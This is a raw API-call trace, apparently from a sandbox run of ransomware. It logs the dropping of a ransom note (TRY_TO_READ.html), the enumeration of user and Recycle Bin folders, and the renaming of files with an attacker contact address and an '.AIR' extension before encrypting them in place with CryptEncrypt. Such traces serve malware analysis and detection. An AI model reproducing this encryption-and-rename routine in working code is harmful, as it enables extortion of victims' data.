	[0051.958] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e90
	[0051.958] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.958] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596590
	[0051.958] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5965a0
	[0051.959] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.959] GetLastError () returned 0x0
	[0051.959] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588cd8
	[0051.959] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.959] GetLastError () returned 0x0
	[0051.959] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x50) returned 0x58b6d8
	[0051.959] CreateFileW (lpFileName="C:\\\\Users\\Public\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8
	[0051.959] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0051.959] WriteFile (in: hFile=0x3d8, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.960] WriteFile (in: hFile=0x3d8, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.960] WriteFile (in: hFile=0x3d8, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.960] CloseHandle (hObject=0x3d8) returned 1
	[0051.960] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588cd8 | out: hHeap=0x540000) returned 1
	[0051.960] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5965a0 | out: hHeap=0x540000) returned 1
	[0051.960] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596590 | out: hHeap=0x540000) returned 1
	[0051.960] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0051.960] FindNextFileW (in: hFindFile=0x5750e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9bcbdb0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9bcbdb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c18070, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0051.960] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.961] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.961] GetLastError () returned 0x0
	[0051.961] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.961] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583b10
	[0051.961] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.961] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.961] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583b10 | out: hHeap=0x540000) returned 1
	[0051.961] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0051.961] FindNextFileW (in: hFindFile=0x5750e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9bcbdb0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9bcbdb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c18070, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0051.961] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.961] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5acfe8
	[0051.961] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596590
	[0051.961] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5acfe8 | out: pbBuffer=0x5acfe8) returned 1
	[0051.961] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596590 | out: pbBuffer=0x596590) returned 1
	[0051.961] SetFileAttributesW (lpFileName="C:\\\\Users\\desktop.ini", dwFileAttributes=0x80) returned 1
	[0051.961] lstrlenW (lpString="C:\\\\Users\\desktop.ini") returned 21
	[0051.961] GetProcessHeap () returned 0x540000
	[0051.961] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x90) returned 0x5832a8
	[0051.961] lstrcpyW (in: lpString1=0x5832a8, lpString2="C:\\\\Users\\desktop.ini" | out: lpString1="C:\\\\Users\\desktop.ini") returned="C:\\\\Users\\desktop.ini"
	[0051.961] lstrcatW (in: lpString1="C:\\\\Users\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR"
	[0051.961] MoveFileExW (lpExistingFileName="C:\\\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), lpNewFileName="C:\\\\Users\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0051.964] CreateFileW (lpFileName="C:\\\\Users\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8
	[0051.964] GetProcessHeap () returned 0x540000
	[0051.964] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0051.964] GetFileSizeEx (in: hFile=0x3d8, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=174) returned 1
	[0051.964] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xae
	[0051.964] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0051.964] GetProcessHeap () returned 0x540000
	[0051.964] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5ad0f0
	[0051.964] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5ad0f0*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5ad0f0*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0051.964] WriteFile (in: hFile=0x3d8, lpBuffer=0x5ad0f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ad0f0*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0051.965] WriteFile (in: hFile=0x3d8, lpBuffer=0x596590*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596590*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0051.965] WriteFile (in: hFile=0x3d8, lpBuffer=0x596590*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596590*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0051.965] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xae) returned 0x598c88
	[0051.965] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xae) returned 0x598d40
	[0051.965] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0051.965] ReadFile (in: hFile=0x3d8, lpBuffer=0x598c88, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x598c88*, lpNumberOfBytesRead=0x3a1f778*=0xae, lpOverlapped=0x0) returned 1
	[0051.965] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=-174, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0051.965] WriteFile (in: hFile=0x3d8, lpBuffer=0x598d40*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x598d40*, lpNumberOfBytesWritten=0x3a1f778*=0xae, lpOverlapped=0x0) returned 1
	[0051.967] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598c88 | out: hHeap=0x540000) returned 1
	[0051.967] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x540000) returned 1
	[0051.967] CloseHandle (hObject=0x3d8) returned 1
	[0051.968] GetProcessHeap () returned 0x540000
	[0051.968] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5ad0f0 | out: hHeap=0x540000) returned 1
	[0051.968] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5acfe8 | out: hHeap=0x540000) returned 1
	[0051.968] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596590 | out: hHeap=0x540000) returned 1
	[0051.968] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0051.968] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.968] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588cd8
	[0051.968] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5939a0 | out: hHeap=0x540000) returned 1
	[0051.968] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x90) returned 0x5832a8
	[0051.968] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56d040 | out: hHeap=0x540000) returned 1
	[0051.968] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0051.968] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596d78 | out: hHeap=0x540000) returned 1
	[0051.968] FindFirstFileW (in: lpFileName="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc9c3e1d0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c3e1d0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575120
	[0051.968] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.968] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.968] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588d60
	[0051.969] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.969] GetLastError () returned 0x0
	[0051.969] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5919d0
	[0051.969] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0051.969] GetLastError () returned 0x0
	[0051.969] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.969] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0051.969] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0051.969] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e40
	[0051.969] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575160
	[0051.969] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575160 | out: hHeap=0x540000) returned 1
	[0051.969] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.969] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.969] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e40 | out: hHeap=0x540000) returned 1
	[0051.969] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.969] FindNextFileW (in: hFindFile=0x575120, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc9c3e1d0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c3e1d0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0051.969] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0051.969] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.969] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588d60
	[0051.969] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.969] GetLastError () returned 0x0
	[0051.969] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5919d0
	[0051.969] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0051.969] GetLastError () returned 0x0
	[0051.969] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.969] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0051.969] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0051.969] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e40
	[0051.969] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575160
	[0051.969] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575160 | out: hHeap=0x540000) returned 1
	[0051.969] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.969] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.969] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e40 | out: hHeap=0x540000) returned 1
	[0051.969] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.970] FindNextFileW (in: hFindFile=0x575120, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0051.970] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0051.970] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.970] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588d60
	[0051.970] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.970] GetLastError () returned 0x0
	[0051.970] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5919d0
	[0051.970] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0051.970] GetLastError () returned 0x0
	[0051.970] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e40
	[0051.970] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.970] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.970] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.970] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.970] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596e40 | out: hHeap=0x540000) returned 1
	[0051.970] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x56e958
	[0051.970] FindNextFileW (in: hFindFile=0x575120, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c3e1d0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9c3e1d0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c3e1d0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0051.970] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0051.970] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.970] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588d60
	[0051.970] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.970] GetLastError () returned 0x0
	[0051.970] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5919d0
	[0051.970] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0051.970] GetLastError () returned 0x0
	[0051.970] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.970] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.970] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.970] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.970] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0051.970] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.970] FindNextFileW (in: hFindFile=0x575120, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c3e1d0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9c3e1d0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c3e1d0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0051.970] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x56b300
	[0051.970] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5adff0
	[0051.971] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596590
	[0051.971] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5adff0 | out: pbBuffer=0x5adff0) returned 1
	[0051.971] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596590 | out: pbBuffer=0x596590) returned 1
	[0051.971] SetFileAttributesW (lpFileName="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini", dwFileAttributes=0x80) returned 1
	[0051.971] lstrlenW (lpString="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 75
	[0051.971] GetProcessHeap () returned 0x540000
	[0051.971] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfc) returned 0x5ae0f8
	[0051.971] lstrcpyW (in: lpString1=0x5ae0f8, lpString2="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" | out: lpString1="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"
	[0051.971] lstrcatW (in: lpString1="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR"
	[0051.971] MoveFileExW (lpExistingFileName="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), lpNewFileName="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0051.974] CreateFileW (lpFileName="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3dc
	[0051.974] GetProcessHeap () returned 0x540000
	[0051.974] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5ae0f8 | out: hHeap=0x540000) returned 1
	[0051.974] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=129) returned 1
	[0051.974] SetFilePointer (in: hFile=0x3dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x81
	[0051.974] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0051.974] GetProcessHeap () returned 0x540000
	[0051.974] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5ae0f8
	[0051.974] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5ae0f8*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5ae0f8*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0051.974] WriteFile (in: hFile=0x3dc, lpBuffer=0x5ae0f8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ae0f8*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0051.975] WriteFile (in: hFile=0x3dc, lpBuffer=0x596590*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596590*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0051.975] WriteFile (in: hFile=0x3dc, lpBuffer=0x596590*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596590*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0051.975] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x81) returned 0x5ae200
	[0051.976] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x81) returned 0x5ae290
	[0051.976] SetFilePointer (in: hFile=0x3dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0051.976] ReadFile (in: hFile=0x3dc, lpBuffer=0x5ae200, nNumberOfBytesToRead=0x81, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ae200*, lpNumberOfBytesRead=0x3a1f778*=0x81, lpOverlapped=0x0) returned 1
	[0051.976] SetFilePointer (in: hFile=0x3dc, lDistanceToMove=-129, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0051.976] WriteFile (in: hFile=0x3dc, lpBuffer=0x5ae290*, nNumberOfBytesToWrite=0x81, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ae290*, lpNumberOfBytesWritten=0x3a1f778*=0x81, lpOverlapped=0x0) returned 1
	[0051.976] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5ae200 | out: hHeap=0x540000) returned 1
	[0051.976] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5ae290 | out: hHeap=0x540000) returned 1
